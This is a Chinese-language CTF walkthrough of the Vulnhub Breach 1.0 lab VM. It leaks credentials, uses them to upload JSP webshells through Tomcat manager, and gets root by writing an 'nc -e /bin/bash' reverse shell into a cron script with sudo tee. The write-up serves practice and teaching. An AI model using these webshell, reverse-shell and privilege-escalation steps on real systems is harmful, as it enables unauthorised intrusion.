Vulnhub简介
Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞 需要使用VMware或VirtualBox 运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的 root 权限和查看 flag
https://www.vulnhub.com/
Breach1.0靶机信息
breach1.0 是一个难度初级到中级的Boot2Root/CTF挑战 静态ip(192.168.110.140),配置环境到同一个网段,我用的kali (192.168.110.128)来进行渗透
下面开始
信息收集
端口简单扫一下,好家伙基本上端口都是开放的,肯定是有问题的 访问192.168.110.140 的 80 端口进入web页面 谷歌翻译了一下,哈哈哈
漏洞挖掘
1、右键查看首页源码,注意到注释很可疑,是一段base64 编码 两次解码得到一串账号密码 2、首页图片可以点击跳转,其他几个页面都是图片啥的,最后一个是 impresscms登录页 既然是登录页,那就用之前得到的账号密码尝试登录,登录成功,注意到有三封邮件 邮件三发现保存一个SSL证书,访问下载一个SSL证书的密钥库keystore,keystore是储存公私钥的一种文件格式 3、返回到左边的功能菜单,挨个查看了一下,profile 目录也看了一下,没发现什么漏洞 但找到一个很可疑的SSL,想到之前拿到的SSL密钥库,就点进去看了 谷歌翻译了一下 得到storepassword and keypassword are all set to 'tomcat'. ,提到了无法读取文件很有可能就是流量包被前面的SSL加密了 访问下载流量包,wireshark打开应该是加密了流量 4、成功导出 .p12 证书,然后就是把他导入到wireshark,导入证书后HTTPS被解密,查看流量包 可以看到原来的一些TLS加密的变成了HTTP 最新版wireshark已经 把SSL 改为 TLS,其实SSL/TLS 都已统称通信加密协议 看样子像是被挂了图片马,执行了cmd 追踪http流,获得Tomcat后台登录地址http://192.168.110.140:8443/_M@nag3Me/html 采用http basic 认证,包含了用户名和密码的数据包 Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC base64 解码得到tomcat:Tt\5D8F(#!*u=G)4m7zB
然后就是去访问Tomcat 后台登录 Tomcat后台的 getshell 有标准姿势,上养马场,准备好jsp版本的各种吗,像cmd小马,菜刀马,jspspy大马,打包成 .zip ,在改成 .war ,上传部署 5、发现问题,用菜刀去连,一会儿就会断开,文件被删除,需要重新上传 war 包,猜测主机可能有杀软或者杀webshell的工具 解决方法,用bash反弹一个shell给我们 可以看我的另一篇文章 Linux反弹shell
查看当前系统用户 cat /etc/passwd ,注意到两个值的关注的用户,root就不用说了,我们关注的主要是有bin/bash 权限的用户 进到网站根目录发现两个很长的文件名的php文件,打开看是数据库的连接文件,用户是 root 密码是空 登录mysql数据库,查询user表,拿到milton的密码MD5 thelaststraw 提权到 milton用户 查看历史命令,看到su blumbergh ,需要找到这个用户的密码 在根目录下有6张图片,用 exiftool 查看详细信息,在bill.png 下看到可疑的注释coffeestains 6、尝试登录blumbergh ,提权成功,历史命令里发现有可疑文件 进入这个文件,这是个清理脚本,每三分钟执行清理删除webapps目录下的所有文件,所以之前的菜刀一直会断连就是被清理了 sudo -l 查看sudo 权限,发现能够以 root权限执行 tee 和 tidyup.sh,tee 命令用于读取标准输入的数据,并将其内容输出成文件,tidyup.sh 就是清理脚本 7、想法就是利用 tee 以 root的权限向清理脚本写入反弹 shell,拿到 root权限
nc反弹shell echo "nc -e /bin/bash 192.168.110.128 4444" > shell.txt
使用 tee命令将shell.txt写到 清理脚本 cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看是否写入 cat /usr/share/cleanup/tidyup.sh 成功写入,nc监听等待反弹shell,root权限 查看隐藏文件,打开 flag.txt ,通关
总结
也是第一次写这种渗透的练习靶场,遇到了很多的坑,比如说各种环境的奇怪报错,linux操作不熟等等很多问题
通过查阅文档资料一个一个问题复现解决也学到了很多,还会继续练习记录靶场学习
道路是曲折的,回首是牛逼的
哈哈哈
|